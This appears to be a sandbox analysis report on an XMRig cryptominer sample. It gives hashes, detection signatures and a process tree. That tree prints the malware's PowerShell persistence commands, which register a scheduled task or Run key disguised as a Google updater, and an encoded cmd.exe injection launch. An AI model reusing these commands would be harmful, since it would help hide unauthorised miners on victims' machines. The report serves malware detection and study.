Overview

overview

10

Static

static

f6fd2a4333...4d.exe

windows7-x64

10

f6fd2a4333...4d.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2022 05:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f6fd2a4333007f65beef7609077ec14d.exe

  • Size

    2.2MB

  • MD5

    f6fd2a4333007f65beef7609077ec14d

  • SHA1

    3740133e77fae5ee1c0ed1cb0493af5557e3562a

  • SHA256

    b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499

  • SHA512

    43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7

  • SSDEEP

    49152:C30HPteDTvEXI2s+HNZlZT+DM+dRQYpeV+wj:CgPteDTsIInZWM+bpeV+

Score
10/10
xmrigminerupx

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Blocklisted process makes network request 17 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6fd2a4333007f65beef7609077ec14d.exe
    "C:\Users\Admin\AppData\Local\Temp\f6fd2a4333007f65beef7609077ec14d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:224
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        3⤵
          PID:3800
    • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1360
      • C:\Windows\system32\cmd.exe
        cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:664
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          3⤵
            PID:2992
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe mrcpapowlrrgcvjb 6E3sjfZq2rJQaxvLPmXgsEqPiBiBLmVqlQRiqAROwnq+r3PgsvOI5CPEjWBkfjMBWeIX+GdZdCENkRpNNWWuUuiiT0nhr8xABS5D2B/qge2fBy16M7G/el0gdMCErX4jNqcnUz2ARFIRcMCpcOiMWItfgkpYfgbwioV0ioLoGuNMU42qRMuIsqjDs2FXseGAy1L1fh1Re+jaH/pdMkIbkcsE1vSzYIpH8WyjqEMFAlci5CLdLe97i0VD0mpaS+Gd+daXi5rj++LAHgkUTDqtbVL59AFDJZ9WYwE1hVlCLXncC2+//LOROJeHXBaIJ7E+zEF1XB8rOli3v9a2WUYdKol3fQS1Z2oPF18nYGSur3scnVljXe+vL6dRgItNbPO7
          2⤵
          • Blocklisted process makes network request
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4672

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        00e7da020005370a518c26d5deb40691

        SHA1

        389b34fdb01997f1de74a5a2be0ff656280c0432

        SHA256

        a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

        SHA512

        9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        38a3e6d454e2b12d2d5ffb64b99ea6aa

        SHA1

        c538daed6a6e064ea7c0262c20131494194371f9

        SHA256

        f412e4f4238fb2df1cf0dfa74ccb339f368f1d6dbea719ca1ec325a22a4f954a

        SHA512

        0e849a81beaeed7cfee9c10e59bfdebfb4f0c9a68ec54f3db82077332ad53fb8a65753d05c1611ee38c34db938697b8c15cd2188b88a7045c8f868d383c02199

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        a5c074e56305e761d7cbc42993300e1c

        SHA1

        39b2e23ba5c56b4f332b3607df056d8df23555bf

        SHA256

        e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

        SHA512

        c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
        Filesize

        2.2MB

        MD5

        d081ded7aeebd495ea24b5531168f315

        SHA1

        21db4bae653ece87474e7121a8b60d9fd08208c9

        SHA256

        6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a

        SHA512

        45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
        Filesize

        226B

        MD5

        fdba80d4081c28c65e32fff246dc46cb

        SHA1

        74f809dedd1fc46a3a63ac9904c80f0b817b3686

        SHA256

        b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

        SHA512

        b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

        Download Submit
      • memory/224-136-0x0000000000000000-mapping.dmp
        Download
      • memory/224-141-0x00007FFDF4230000-0x00007FFDF4CF1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/664-146-0x0000000000000000-mapping.dmp
        Download
      • memory/1360-142-0x0000000000000000-mapping.dmp
        Download
      • memory/1360-144-0x00007FFDF4180000-0x00007FFDF4C41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1360-145-0x00007FFDF4180000-0x00007FFDF4C41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2992-147-0x0000000000000000-mapping.dmp
        Download
      • memory/3800-139-0x0000000000000000-mapping.dmp
        Download
      • memory/4360-132-0x0000000000000000-mapping.dmp
        Download
      • memory/4360-135-0x00007FFDF4230000-0x00007FFDF4CF1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4360-134-0x00007FFDF4230000-0x00007FFDF4CF1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4360-133-0x0000022A99D30000-0x0000022A99D52000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4672-149-0x00007FF63B9725D0-mapping.dmp
        Download
      • memory/4672-150-0x000002776AE20000-0x000002776AE40000-memory.dmp
        Filesize

        128KB

        Download
      • memory/4672-151-0x00007FF63B180000-0x00007FF63B974000-memory.dmp
        Filesize

        8.0MB

        Download
      • memory/4672-152-0x00007FF63B180000-0x00007FF63B974000-memory.dmp
        Filesize

        8.0MB

        Download